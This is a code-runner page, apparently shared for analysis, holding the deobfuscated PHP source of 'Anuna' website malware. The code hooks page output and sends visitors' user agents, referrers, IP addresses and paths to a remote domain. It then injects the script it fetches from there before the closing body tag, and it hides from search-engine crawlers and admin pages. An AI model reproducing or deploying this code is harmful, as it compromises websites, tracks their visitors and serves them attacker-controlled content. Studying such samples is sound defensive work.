PHP!Anuna final deobfuscated code

Run Settings
LanguagePHP
Language Version
Run Command
<?php function g_1($url) { if (function_exists("file_get_contents") === false) return false; $buf = @file_get_contents($url); if ($buf == "") return false; return $buf; } function g_2($url) { if (function_exists("curl_init") === false) return false; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_HEADER, 0); $res = curl_exec($ch); curl_close($ch); if ($res == "") return false; return $res; } function g_3($url) { if (function_exists("file") === false) return false; $inc = @file($url); $buf = @implode("", $inc); if ($buf == "") return false; return $buf; } function g_4($url) { if (function_exists("socket_create") === false) return false; $p = @parse_url($url); $host = $p["host"]; if (!isset($p["query"])) $p["query"] = ""; $uri = $p["path"] . "?" . $p["query"]; $ip1 = @gethostbyname($host); $ip2 = @long2ip(@ip2long($ip1)); if ($ip1 != $ip2) return false; $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (!@socket_connect($sock, $ip1, 80)) { @socket_close($sock); return false; } $req = "GET $uri HTTP/1.0\n"; $req.= "Host: $host\n\n"; socket_write($sock, $req); $buf = ""; while ($t = socket_read($sock, 10000)) { $buf.= $t; } @socket_close($sock); if ($buf == "") return false; list($m, $buf) = explode("\r\n\r\n", $buf); return $buf; } function gtd($url) { $co = ""; $co = @g_1($url); if ($co !== false) return $co; $co = @g_2($url); if ($co !== false) return $co; $co = @g_3($url); if ($co !== false) return $co; $co = @g_4($url); if ($co !== false) return $co; return ""; } if (!function_exists("comgzi")) { function comgzi($gzData) { if (substr($gzData, 0, 3) == "\x1f\x8b\x08") { $i = 10; $flg = ord(substr($gzData, 3, 1)); if ($flg > 0) { if ($flg & 4) { list($xlen) = unpack("v", substr($gzData, $i, 2)); $i = $i + 2 + $xlen; } if ($flg & 8) $i = strpos($gzData, "\0", $i) + 1; if ($flg & 16) $i = strpos($gzData, "\0", $i) + 1; if ($flg & 2) $i = $i + 2; } return @gzinflate(substr($gzData, $i, -8)); } else { return false; } } } function k34($op, $text) { return base64_encode(en2($text, $op)); } function check212($param) { if (!isset($_SERVER[$param])) $a = "non"; else if ($_SERVER[$param] == "") $a = "non"; else $a = $_SERVER[$param]; return $a; } function day212() { $a = check212("HTTP_USER_AGENT"); $b = check212("HTTP_REFERER"); $c = check212("REMOTE_ADDR"); $d = check212("HTTP_HOST"); $e = check212("PHP_SELF"); $domarr = array( "33db9538", "9507c4e8", "e5b57288", "54dfa1cb" ); if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array( "google", "slurp", "msnbot", "ia_archiver", "yandex", "rambler" )) . "/i", strtolower($a)))) { $o1 = ""; } else { $op = mt_rand(100000, 999999); $g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e))); $url = "http://" . cqq(".com") . "/" . $g4; $ca1 = en2(@gtd($url) , $op); $a1 = @explode("!NF0", $ca1); if (sizeof($a1) >= 2) $o1 = $a1[1]; else $o1 = ""; } return $o1; } if (!function_exists("dcoo")) { function dcoo($cz, $length = null) { if (false !== ($dz = @gzinflate($cz))) return $dz; if (false !== ($dz = @comgzi($cz))) return $dz; if (false !== ($dz = @gzuncompress($cz))) return $dz; if (function_exists("gzdecode")) { $dz = @gzdecode($cz); if (false !== $dz) return $dz; } return $cz; } } if (!function_exists("pa22")) { function pa22($v) { Header("Content-Encoding: none"); $p = "\x70\162\x65\147\x5f"; $p1 = $p . "\155\x61\164\x63\150"; $p2 = $p . "\162\x65\160\x6c\141\x63\145"; $t = dcoo($v); if ($p1("/\<\/body/si", $t)) { return $p2("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1); } else { if ($p1("/\<\/html/si", $t)) { return $p2("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1); } else { return $t; } } } } ob_start("pa22");
Editor Settings
Theme
Key bindings
Full width
Lines